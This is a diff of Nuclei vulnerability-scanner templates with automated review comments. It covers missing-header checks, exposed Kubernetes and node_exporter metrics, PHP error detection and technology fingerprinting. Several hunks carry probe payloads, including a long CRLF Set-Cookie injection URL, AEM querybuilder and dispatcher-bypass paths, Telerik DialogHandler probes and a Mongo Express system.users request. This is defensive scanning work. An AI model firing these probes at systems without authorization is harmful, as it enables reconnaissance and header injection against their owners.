stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/a.htaccess"
|
||||
- "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
@ -1,17 +0,0 @@
id: missing-csp
|
||||
info:
|
||||
name: CSP Not Enforced
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: Checks if there is a CSP header
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''content-security-policy'')'
@ -1,17 +0,0 @@
id: missing-hsts
|
||||
info:
|
||||
name: Strict Transport Security Not Enforced
|
||||
author: Dawid Czarnecki
|
||||
severity: info
|
||||
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''strict-transport-security'')'
@ -1,18 +0,0 @@
id: missing-x-content-type-options
|
||||
|
||||
info:
|
||||
name: X-Content-Type-Options unidentified
|
||||
author: G4L1T0 and @convisoappsec
|
||||
severity: info
|
||||
description: Check for X-Content-Type-Options header
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''x-content-type-options'')'
@ -1,19 +0,0 @@
id: missing-x-frame-options
|
||||
|
||||
info:
|
||||
name: Clickjacking (Missing XFO header)
|
||||
author: kurohost
|
||||
severity: low
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(all_headers), 'x-frame-options')"
@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -20,6 +20,7 @@ requests:
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
|
||||
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
@ -66,6 +66,8 @@ requests:
- '{{BaseURL}}///etc.children.json/FNZ.html'
|
||||
- '{{BaseURL}}///etc.children.json/FNZ.png'
|
||||
- '{{BaseURL}}///etc.children.json/FNZ.ico'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
|
||||
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -13,9 +13,8 @@ requests:
- "{{BaseURL}}/views/ajax/autocomplete/user/a"
|
||||
- "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a"
|
||||
- "{{BaseURL}}/?q=views/ajax/autocomplete/user/a"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -13,17 +13,19 @@ requests:
- "{{BaseURL}}/user/1"
|
||||
- "{{BaseURL}}/user/2"
|
||||
- "{{BaseURL}}/user/3"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
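Review bot: The regex `(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+` uses empty alternatives where optional groups read more clearly and avoid capture groups: `'(?i)Location: https?://[\w.\-]+(?:/ar|/en)?/users/\w+'`. As written it also recognises only `/ar` and `/en` language prefixes, so multilingual sites with other prefixes are missed; either generalise the prefix (`(?:/[a-z]{2})?`) or note the limitation in a comment. The extractor that begins at the end of the hunk continues outside it.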
|
||||
@ -0,0 +1,127 @@
id: http-missing-security-headers
|
||||
|
||||
info:
|
||||
name: HTTP Missing Security Headers
|
||||
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
|
||||
severity: info
|
||||
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
|
||||
tags: misconfig,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: strict-transport-security
|
||||
regex:
|
||||
- "(?i)strict-transport-security"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: content-security-policy
|
||||
regex:
|
||||
- "(?i)content-security-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: x-frame-options
|
||||
regex:
|
||||
- "(?i)x-frame-options"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: x-content-type-options
|
||||
regex:
|
||||
- "(?i)x-content-type-options"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: x-permitted-cross-domain-policies
|
||||
regex:
|
||||
- "(?i)x-permitted-cross-domain-policies"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: referrer-policy
|
||||
regex:
|
||||
- "(?i)referrer-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: clear-site-data
|
||||
regex:
|
||||
- "(?i)clear-site-data"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-embedder-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-embedder-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-opener-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-opener-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-resource-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-resource-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-origin
|
||||
regex:
|
||||
- "(?i)access-control-allow-origin"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-credentials
|
||||
regex:
|
||||
- "(?i)access-control-allow-credentials"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-expose-headers
|
||||
regex:
|
||||
- "(?i)access-control-expose-headers"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-max-age
|
||||
regex:
|
||||
- "(?i)access-control-max-age"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-methods
|
||||
regex:
|
||||
- "(?i)access-control-allow-methods"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-headers
|
||||
regex:
|
||||
- "(?i)access-control-allow-headers"
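Review bot: By my count the rendered section shows all 127 added lines and the last is `- "(?i)access-control-allow-headers"`, so the final matcher has no `negative: true` and no `part: header`, unlike the fifteen before it; it therefore matches positively on a body that merely contains that string instead of flagging a missing header — add the two lines or drop the matcher. More broadly, with `matchers-condition: or` any host missing any one header is reported, and the absence of the six `access-control-*` headers is the secure default for a non-CORS response (and `clear-site-data` is only expected on logout-type responses), so those negative matchers report the safe configuration as a finding on nearly every target; restrict the set to headers whose absence is a weakness (HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy) and keep the CORS names, if wanted, as a separate informational template. The description (`could be so less generic and could be useless for Bug Bounty`) should state what the template reports rather than apologise for it.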
@ -0,0 +1,29 @@
id: kubernetes-metrics
|
||||
|
||||
info:
|
||||
name: Detect Kubernetes Exposed Metrics
|
||||
author: pussycat0x
|
||||
severity: low
|
||||
description: Information Disclosure of Garbage Collection
|
||||
tags: kubernetes,exposure,devops
|
||||
reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/metrics"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- "namespace"
|
||||
- "HELP"
|
||||
- "TYPE"
|
||||
- "kube"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
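Review bot: The description `Information Disclosure of Garbage Collection` is the same text as the node-exporter template in this commit and does not describe a Kubernetes metrics endpoint; `description: Detects an unauthenticated Kubernetes component /metrics endpoint exposing Prometheus metrics.` would fit the matcher. `HELP` and `TYPE` are generic Prometheus exposition-format tokens and `namespace` is a common label, so discrimination rests on the single word `kube`; a metric-name prefix emitted only by Kubernetes components (for example `apiserver_` or `kubelet_`) would reduce hits on unrelated exporters that merely mention kube.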
@ -13,16 +13,18 @@ requests:
path:
|
||||
- '{{BaseURL}}/pods'
|
||||
- '{{BaseURL}}/api/v1/pods'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "apiVersion"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,24 @@
id: kubernetes-resource-report
|
||||
|
||||
info:
|
||||
name: Detect Overview Kubernetes Resource Report
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: Information Disclosure of Kubernetes Resource Report
|
||||
tags: kubernetes,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Overview - Kubernetes Resource Report"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,26 @@
id: node-exporter-metrics
|
||||
|
||||
info:
|
||||
name: Detect Node Exporter Metrics
|
||||
author: pussycat0x
|
||||
severity: low
|
||||
description: Information Disclosure of Garbage Collection
|
||||
tags: node,exposure,debug
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/metrics"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "node_cooling_device"
|
||||
- "node_network"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
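Review bot: The description `Information Disclosure of Garbage Collection` does not match a node_exporter check (the matcher looks for the host metrics `node_cooling_device` and `node_network`); `description: Detects an exposed Prometheus node_exporter /metrics endpoint.` would. `node_cooling_device` comes from the thermal collector and, to my knowledge, is only emitted when the host exposes `/sys/class/thermal`, so many VMs and containers fail the `and` condition; `node_exporter_build_info` or `node_scrape_collector_success` appear on every node_exporter and are safer anchors. The `node` tag is ambiguous with Node.js; `prometheus,node-exporter` would be unambiguous.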
@ -2,31 +2,39 @@ id: php_errors
|
||||
info:
|
||||
name: PHP errors
|
||||
author: w4cky_
|
||||
author: w4cky_,geeknik
|
||||
severity: info
|
||||
tags: debug
|
||||
tags: debug,php
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Fatal error"
|
||||
- "Call to undefined method"
|
||||
- "You have an error in your SQL syntax;"
|
||||
- "MySQL server version for the right syntax to use near"
|
||||
- "PHP Warning"
|
||||
- "PHP Error"
|
||||
- "Warning: mysql_connect():"
|
||||
- "Warning: mysql_query()"
|
||||
- "Warning: pg_connect():"
|
||||
- "failed to open stream: HTTP request failed"
|
||||
- "SAFE MODE Restriction in effect."
|
||||
- "Cannot modify header information"
|
||||
- "ORA-00921: unexpected end of SQL command"
|
||||
- "ORA-00933: SQL command not properly ended"
|
||||
- "ORA-00936: missing expression"
|
||||
- "ORA-12541: TNS:no listener"
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)Fatal error'
|
||||
- '(?i)Call to undefined method'
|
||||
- '(?i)You have an error in your SQL syntax'
|
||||
- '(?i)MySQL server version for the right syntax to use near'
|
||||
- '(?i)MySQL cannot create a temporary file'
|
||||
- '(?i)PHP (Warning|Error)'
|
||||
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
|
||||
- '(?i)failed to open stream\:'
|
||||
- '(?i)SAFE MODE Restriction in effect'
|
||||
- '(?i)Cannot modify header information'
|
||||
- '(?i)ORA-00921\: unexpected end of SQL command'
|
||||
- '(?i)ORA-00933\: SQL command not properly ended'
|
||||
- '(?i)ORA-00936\: missing expression'
|
||||
- '(?i)ORA-12541\: TNS\:no listener'
|
||||
- '(?i)uncaught exception'
|
||||
- '(?i)include_path'
|
||||
- '(?i)undefined index'
|
||||
- '(?i)undefined variable\:'
|
||||
- '(?i)stack trace\:'
|
||||
- '(?i)expects parameter [0-9]*'
|
||||
- '(?i)Debug Trace'
|
||||
- '(?i)(syntax|parse) error'
|
||||
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
|
||||
- '(?i)Maximum execution time of \d* seconds exceeded'
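Review bot: It looks like the word matcher block (`matchers:` through the `ORA-12541: TNS:no listener` entry) is on the removed side, leaving the file with extractors only; as far as I recall nuclei then reports a result whenever any extractor regex matches, and several of the new patterns — `(?i)include_path`, `(?i)undefined index`, `(?i)Debug Trace`, `(?i)stack trace\:`, `(?i)(syntax|parse) error` — match documentation, forum or changelog pages that merely discuss PHP errors, so the false-positive rate rises sharply. Keep a `matchers:` block with a regex matcher on the tighter patterns (`Fatal error`, `Warning\: (pg|mysql)_`, the `ORA-` codes, the memory/time-limit messages) and let the extractors only surface the matched text. `id: php_errors` uses an underscore where every other id in this commit is hyphenated. The hunk starts before the `info:` block and ends at the extractors.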
|
||||
@ -1,8 +1,8 @@
id: unauthenticated-mongo-express.yaml
|
||||
id: unauthenticated-mongo-express
|
||||
|
||||
info:
|
||||
name: Mongo Express Unauthenticated
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK,b0rn2r00t
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/ghdb/5684
|
||||
tags: mongo,unauth
|
||||
@ -12,12 +12,15 @@ requests:
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/mongo-express/'
|
||||
- '{{BaseURL}}/db/admin/system.users'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Home - Mongo Express</title>'
|
||||
- '<title>system.users - Mongo Express</title>'
|
||||
condition: or
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
@ -0,0 +1,25 @@
id: abyss-web-server
|
||||
|
||||
info:
|
||||
name: Detect Abyss Web Server
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech
|
||||
additional-fields:
|
||||
fofa-dork: 'app="Abyss-Web-Server"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Welcome to Abyss Web Server"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
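Review bot: `tags: tech` alone does not name the product, whereas the other detectors in this commit carry one (`adobe,coldfusion`, `kubernetes,exposure`); `tags: tech,abyss` would let the template be selected by product. There is no `description`; `description: Detects the Abyss Web Server default landing page.` matches the single body word that is checked. `additional-fields:` wrapping `fofa-dork` — confirm this key is one that nuclei's info block recognises; if the fofa query is free-form metadata, the key name should follow whatever the templates guide prescribes.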
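--- /dev/null
+++ b/PATH-NOT-SHOWN/adobe-coldfusion-detector.yaml
@@ -0,0 +1,62 @@
+id: adobe-coldfusion-detector
+
+info:
+  name: Adobe ColdFusion Detector
+  author: philippedelteil
+  severity: info
+  description: With this template we can detect the version number of Coldfusion instances based on their logos.
+  tags: adobe,coldfusion
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
+      - "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
+      - "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
+      - "{{BaseURL}}/cfide/administrator/images/background.jpg"
+      - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
+      - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
+
+    redirects: true
+    stop-at-first-match: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        name: "coldfusion-8"
+        dsl:
+          - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-9"
+        dsl:
+          - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-10"
+        dsl:
+          - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-11"
+        dsl:
+          - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-2016"
+        dsl:
+          - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-2021"
+        dsl:
+          - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-2018"
+        dsl:
+          - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
+
+      - type: dsl
+        name: "coldfusion-mx-7"
+        dsl:
+          - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"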
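Review bot: The new detector is tagged `tags: adobe,coldfusion` while every other technology-detection template in this commit carries the `tech` tag (`tags: tech`, `tags: tech,kubernetes`, `tags: tech,oracle`), so a `-tags tech` run would skip it; suggest `tags: tech,adobe,coldfusion`. The description is written in the first person and does not say what is actually compared; suggest `description: Fingerprints the Adobe ColdFusion version from the MD5 hash of the administrator login images under /CFIDE/administrator/images/.` so the reader knows a changed or re-encoded image silently breaks detection. The `coldfusion-2018` matcher is listed after `coldfusion-2021`; ordering the version matchers chronologically would make future additions easier to place.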
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/axis2/"
|
||||
- "{{BaseURL}}/axis/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
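--- /dev/null
+++ b/PATH-NOT-SHOWN/craft-cms-detect.yaml
@@ -0,0 +1,28 @@
+id: craft-cms-detect
+
+info:
+  name: Craft CMS Detect
+  author: skeltavik
+  severity: info
+  description: Detects Craft CMS
+  reference: https://craftcms.com
+  tags: tech,craftcms
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'X-Powered-By: Craft CMS'
+
+      - type: regex
+        part: header
+        regex:
+          - 'Set-Cookie: (Craft|CRAFT)'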
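Review bot: The header word matcher `'X-Powered-By: Craft CMS'` is a case-sensitive match, so a server that emits the header name in lower case (`x-powered-by: Craft CMS`, as HTTP/2 and some proxies do) is not detected, and the `Set-Cookie: (Craft|CRAFT)` regex has the same exposure in its header name. The rest of this diff already uses `(?i)` in its regex matchers, so the portable fix is to fold the header check into the regex matcher with `- '(?i)x-powered-by: craft cms'` and `- '(?i)set-cookie: craft'`. Note the template sets no `matchers-condition`, so the matchers are combined with nuclei's default, and either header alone is enough to report the technology.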
@ -52,6 +52,7 @@ requests:
|
|||
|
||||
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
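--- /dev/null
+++ b/PATH-NOT-SHOWN/kubernetes-enterprise-manager.yaml
@@ -0,0 +1,25 @@
+id: kubernetes-enterprise-manager
+
+info:
+  name: Detect Kubernetes Enterprise Manager
+  author: pussycat0x
+  severity: info
+  tags: tech,kubernetes
+  additional-fields:
+    fofa-dork: 'app="Kubernetes-Enterprise-Manager"'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Kubernetes Enterprise Manager"
+
+      - type: status
+        status:
+          - 200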
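--- /dev/null
+++ b/PATH-NOT-SHOWN/kubernetes-mirantis.yaml
@@ -0,0 +1,25 @@
+id: kubernetes-mirantis
+
+info:
+  name: Detect Mirantis Kubernetes Engine
+  author: pussycat0x
+  severity: info
+  tags: tech,kubernetes
+  additional-fields:
+    fofa-dork: 'app="Mirantis-Kubernetes-Engine"'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Mirantis Kubernetes Engine"
+
+      - type: status
+        status:
+          - 200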
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/iNotes/Forms85.nsf"
|
||||
- "{{BaseURL}}/iNotes/Forms9.nsf"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- "{{BaseURL}}/openam/json/serverinfo/*"
|
||||
|
||||
redirects: true
|
||||
stop-at-first-match: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
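--- /dev/null
+++ b/PATH-NOT-SHOWN/oracle-iplanet-web-server.yaml
@@ -0,0 +1,25 @@
+id: oracle-iplanet-web-server
+
+info:
+  name: Detect Oracle-iPlanet-Web-Server
+  author: pussycat0x
+  severity: info
+  tags: tech,oracle
+  additional-fields:
+    fofa-dork: 'app="Oracle-iPlanet-Web-Server'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Oracle iPlanet Web Server"
+
+      - type: status
+        status:
+          - 200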
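Review bot: The `fofa-dork` value in this template is missing its closing double quote — `'app="Oracle-iPlanet-Web-Server'` — unlike the three sibling templates in this commit, which all close the inner quote; it should read `fofa-dork: 'app="Oracle-iPlanet-Web-Server"'`. The YAML still parses because the outer single quotes are balanced, so nothing in `nuclei -validate` will catch it, but the dork is copied verbatim by tooling that consumes `additional-fields` and will be rejected there. The matching logic of the template is unaffected.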
@ -29,6 +29,7 @@ requests:
|
|||
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -20,6 +20,7 @@ requests:
|
|||
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%
0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
|
|